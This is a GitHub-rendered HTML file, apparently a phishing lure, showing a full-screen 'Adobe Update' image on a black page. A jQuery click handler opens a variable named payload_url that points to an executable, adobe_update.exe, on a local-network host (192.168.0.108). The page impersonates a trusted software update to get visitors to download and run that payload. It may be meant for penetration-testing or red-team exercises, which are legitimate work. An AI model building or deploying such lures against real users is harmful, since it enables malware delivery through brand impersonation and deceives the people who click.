-
Notifications
You must be signed in to change notification settings - Fork 6
/
Copy pathindex.html
54 lines (42 loc) · 1.15 KB
/
index.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Adobe</title>
<style>
*{
margin: 0;
padding: 0;
}
body{
background-color: black;
}
.window-box{
width: 100%;
height: 100vh;
display: flex;
}
.window-box img{
display: block;
margin: auto;
border: 2px solid white;
border-radius: 10px;
}
</style>
</head>
<body>
<div id="CF_OPEN" class="window-box">
<img src="image/adobe_update.png" alt="Adobe Update">
</div>
<script src="https://code.jquery.com/jquery-3.4.1.min.js" integrity="sha256-CSXorXvZcTkaix6Yvo6HppcZGetbYMGWSFlBw8HfCJo=" crossorigin="anonymous"></script>
<script type="text/javascript">
$(document).ready(function (){
$('#CF_OPEN').on('click', function(){
var payload_url = "http://192.168.0.108/payload/adobe_update.exe";
window.open(payload_url, '_blank');
});
});
</script>
</body>
</html>